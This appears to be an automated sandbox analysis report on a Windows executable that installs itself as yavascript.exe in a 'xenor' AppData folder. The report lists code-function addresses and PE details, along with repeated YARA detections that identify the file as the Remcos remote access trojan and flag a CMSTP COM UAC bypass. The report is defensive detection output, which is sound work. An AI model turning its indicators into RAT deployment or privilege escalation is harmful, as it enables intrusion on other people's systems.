Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00436D48	0_2_00436D48
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00434D22	0_2_00434D22
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00426E73	0_2_00426E73
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00440E20	0_2_00440E20
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0043CE3B	0_2_0043CE3B
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00412F45	0_2_00412F45
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00452F00	0_2_00452F00
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00426FAD	0_2_00426FAD
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_02497214	0_2_02497214
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0248D2D8	0_2_0248D2D8
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024AD2FF	0_2_024AD2FF
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024C2339	0_2_024C2339
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024A73B7	0_2_024A73B7
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024970DA	0_2_024970DA
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024B1087	0_2_024B1087
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024AD0A2	0_2_024AD0A2
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024A6411	0_2_024A6411
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024964BB	0_2_024964BB
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_02496A32	0_2_02496A32
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0248E846	0_2_0248E846
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024ACE73	0_2_024ACE73
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024ACC44	0_2_024ACC44
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024A2CB0	0_2_024A2CB0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0041D071	23_2_0041D071
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_004520D2	23_2_004520D2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0043D098	23_2_0043D098
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00437150	23_2_00437150
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_004361AA	23_2_004361AA
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00426254	23_2_00426254
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00431377	23_2_00431377
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0043651C	23_2_0043651C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0041E5DF	23_2_0041E5DF
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0044C739	23_2_0044C739
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_004367C6	23_2_004367C6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_004267CB	23_2_004267CB
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0043C9DD	23_2_0043C9DD
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00432A49	23_2_00432A49
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00436A8D	23_2_00436A8D
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0043CC0C	23_2_0043CC0C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00436D48	23_2_00436D48
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00434D22	23_2_00434D22
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00426E73	23_2_00426E73
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00440E20	23_2_00440E20
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0043CE3B	23_2_0043CE3B
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00412F45	23_2_00412F45
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00452F00	23_2_00452F00
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00426FAD	23_2_00426FAD
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B1D0A2	23_2_00B1D0A2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B21087	23_2_00B21087
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B070DA	23_2_00B070DA
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B1D2FF	23_2_00B1D2FF
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AFD2D8	23_2_00AFD2D8
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B07214	23_2_00B07214
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B173B7	23_2_00B173B7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B32339	23_2_00B32339
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B064BB	23_2_00B064BB
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B16411	23_2_00B16411
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AFE846	23_2_00AFE846
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B06A32	23_2_00B06A32
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B12CB0	23_2_00B12CB0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B1CC44	23_2_00B1CC44
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B1CE73	23_2_00B1CE73
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0041D071	24_2_0041D071
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_004520D2	24_2_004520D2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0043D098	24_2_0043D098
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00437150	24_2_00437150
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_004361AA	24_2_004361AA
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00426254	24_2_00426254
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00431377	24_2_00431377
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0043651C	24_2_0043651C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0041E5DF	24_2_0041E5DF
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0044C739	24_2_0044C739
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_004367C6	24_2_004367C6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_004267CB	24_2_004267CB
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0043C9DD	24_2_0043C9DD
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00432A49	24_2_00432A49
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00436A8D	24_2_00436A8D
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0043CC0C	24_2_0043CC0C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00436D48	24_2_00436D48
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00434D22	24_2_00434D22
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00426E73	24_2_00426E73
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00440E20	24_2_00440E20
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0043CE3B	24_2_0043CE3B
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00412F45	24_2_00412F45
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00452F00	24_2_00452F00
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00426FAD	24_2_00426FAD
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02537214	24_2_02537214
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0252D2D8	24_2_0252D2D8
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0254D2FF	24_2_0254D2FF
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02562339	24_2_02562339
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_025473B7	24_2_025473B7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_025370DA	24_2_025370DA
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02551087	24_2_02551087
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0254D0A2	24_2_0254D0A2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02546411	24_2_02546411
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_025364BB	24_2_025364BB
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02536A32	24_2_02536A32
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0252E846	24_2_0252E846
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0254CE73	24_2_0254CE73
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0254CC44	24_2_0254CC44
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02542CB0	24_2_02542CB0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0041D071	35_2_0041D071
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_004520D2	35_2_004520D2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0043D098	35_2_0043D098
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00437150	35_2_00437150
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_004361AA	35_2_004361AA
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00426254	35_2_00426254
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00431377	35_2_00431377
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0043651C	35_2_0043651C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0041E5DF	35_2_0041E5DF
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0044C739	35_2_0044C739
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_004367C6	35_2_004367C6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_004267CB	35_2_004267CB
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0043C9DD	35_2_0043C9DD
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00432A49	35_2_00432A49
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00436A8D	35_2_00436A8D
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0043CC0C	35_2_0043CC0C
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00436D48	35_2_00436D48
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00434D22	35_2_00434D22
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00426E73	35_2_00426E73
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00440E20	35_2_00440E20
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0043CE3B	35_2_0043CE3B
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00412F45	35_2_00412F45
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00452F00	35_2_00452F00
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00426FAD	35_2_00426FAD
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_02507214	35_2_02507214
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024FD2D8	35_2_024FD2D8
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0251D2FF	35_2_0251D2FF
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_02532339	35_2_02532339
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_025173B7	35_2_025173B7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_025070DA	35_2_025070DA
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_02521087	35_2_02521087
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0251D0A2	35_2_0251D0A2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_02516411	35_2_02516411
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_025064BB	35_2_025064BB
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_02506A32	35_2_02506A32
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024FE846	35_2_024FE846
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0251CE73	35_2_0251CE73
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0251CC44	35_2_0251CC44
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_02512CB0	35_2_02512CB0

Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 024E234E appears 37 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 0043ADAE appears 45 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 0251234E appears 37 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00401D64 appears 64 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00447174 appears 54 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00401F66 appears 150 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00B14217 appears 46 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00401FAA appears 63 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00403B40 appears 72 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00B13B0C appears 41 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00433FB0 appears 165 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00406478 appears 33 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 02544217 appears 46 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00AE234E appears 37 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00444B14 appears 84 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00404C9E appears 48 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 02543B0C appears 41 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 004026CE appears 45 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 004020E7 appears 119 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 02513B0C appears 41 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 02514217 appears 46 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 004567E0 appears 39 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00401E8F appears 55 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00401E52 appears 33 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 004040BB appears 54 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 00410D8D appears 54 times
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: String function: 004338A5 appears 123 times
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: String function: 004020E7 appears 39 times
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: String function: 0247234E appears 37 times
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: String function: 024A4217 appears 46 times
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: String function: 024A3B0C appears 41 times
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: String function: 00401F66 appears 50 times
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: String function: 004338A5 appears 41 times
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: String function: 00433FB0 appears 55 times

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 928

Source: 2iH7rqx9rQ.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: yavascript.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: 2iH7rqx9rQ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 23.2.yavascript.exe.ae0e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 23.2.yavascript.exe.ae0e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 23.2.yavascript.exe.ae0e67.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 35.2.yavascript.exe.24e0e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 35.2.yavascript.exe.24e0e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 35.2.yavascript.exe.24e0e67.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 23.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 23.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 35.2.yavascript.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 35.2.yavascript.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 35.2.yavascript.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.3.yavascript.exe.2590000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.3.yavascript.exe.2590000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.3.yavascript.exe.2590000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.yavascript.exe.2510e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.yavascript.exe.2510e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.yavascript.exe.2510e67.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.2iH7rqx9rQ.exe.2470e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.2iH7rqx9rQ.exe.2470e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.2iH7rqx9rQ.exe.2470e67.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
